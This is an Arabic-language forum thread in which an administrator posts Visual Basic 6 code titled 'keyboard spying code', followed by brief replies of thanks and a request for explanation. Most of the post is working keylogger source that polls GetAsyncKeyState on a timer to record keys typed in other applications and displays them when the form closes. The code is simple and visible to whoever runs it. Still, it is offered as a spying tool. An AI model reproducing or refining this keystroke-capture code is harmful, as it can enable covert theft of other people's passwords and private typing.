منتديات المنة
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتديات المنة

منتدى خاص بالأورجات شراء - بيع - تبادل أصوات
 
الرئيسيةالبوابةأحدث الصورالتسجيلدخول

 

 كود التجسس على لوحة المفاتيح

اذهب الى الأسفل 
3 مشترك
كاتب الموضوعرسالة
mefayed
مدير عام المنتدى
مدير عام المنتدى
mefayed


عدد الرسائل : 495
تاريخ التسجيل : 07/11/2006

كود التجسس على لوحة المفاتيح Empty
مُساهمةموضوع: كود التجسس على لوحة المفاتيح   كود التجسس على لوحة المفاتيح Emptyالخميس ديسمبر 07, 2006 4:51 pm

التجسس على لوحة المفاتيح

Private Sub Form_Load()
Me.Caption = "Key Spy"
'Create an API-timer
SetTimer Me.hwnd, 0, 1, AddressOf TimerProc
End Sub
Private Sub Form_Paint()
Dim R As RECT
Const mStr = "Start this project, go to another application, type something, switch back to this application and unload the form. If you unload the form, a messagebox with all the typed keys will be shown."
'Clear the form
Me.Cls
'API uses pixels
Me.ScaleMode = vbPixels
'Set the rectangle's values
SetRect R, 0, 0, Me.ScaleWidth, Me.ScaleHeight
'Draw the text on the form
DrawTextEx Me.hDC, mStr, Len(mStr), R, DT_WORDBREAK Or DT_CENTER, ByVal 0&
End Sub
Private Sub Form_Resize()
Form_Paint
End Sub
Private Sub Form_Unload(Cancel As Integer)
'Kill our API-timer
KillTimer Me.hwnd, 0
'Show all the typed keys
MsgBox sSave
End Sub

ونكتب في موديل Modell

Public Const DT_CENTER = &H1
Public Const DT_WORDBREAK = &H10
Type RECT
**** As Long
Top As Long
Right As Long
Bottom As Long
End Type
Declare Function DrawTextEx Lib "user32" Alias "DrawTextExA" (ByVal hDC As Long, ByVal lpsz As String, ByVal n As Long, lpRect As RECT, ByVal un As Long, ByVal lpDrawTextParams As Any) As Long
Declare Function SetTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long
Declare Function KillTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Declare Function SetRect Lib "user32" (lpRect As RECT, ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Global Cnt As Long, sSave As String, sOld As String, Ret As String
Dim Tel As Long
Function GetPressedKey() As String
For Cnt = 32 To 128
'Get the keystate of a specified key
If GetAsyncKeyState(Cnt) <> 0 Then
GetPressedKey = Chr$(Cnt)
Exit For
End If
Next Cnt
End Function
Sub TimerProc(ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long)
Ret = GetPressedKey
If Ret <> sOld Then
sOld = Ret
sSave = sSave + sOld
End If
End Sub

الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://mady.niceboard.com
goma
مشرف عام
مشرف عام



عدد الرسائل : 71
تاريخ التسجيل : 09/11/2006

كود التجسس على لوحة المفاتيح Empty
مُساهمةموضوع: رد: كود التجسس على لوحة المفاتيح   كود التجسس على لوحة المفاتيح Emptyالخميس فبراير 15, 2007 11:28 pm

مشكووووووووووور
الرجوع الى أعلى الصفحة اذهب الى الأسفل
مروى
مشرفة منتدى المرأة



عدد الرسائل : 87
تاريخ التسجيل : 22/11/2006

كود التجسس على لوحة المفاتيح Empty
مُساهمةموضوع: رد: كود التجسس على لوحة المفاتيح   كود التجسس على لوحة المفاتيح Emptyالأحد يوليو 15, 2007 6:00 pm

هل تتفضل بالشرح كيفية الاستفادة من هذا الموضوع الانجليزى
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
كود التجسس على لوحة المفاتيح
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» تحريك الماوس من لوحة المفاتيح
» كتاب عن جميع إختصارات لوحة المفاتيح

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات المنة :: قسم التكنولوجيا المتطورة :: منتدى الفيجوال بيزك-
انتقل الى: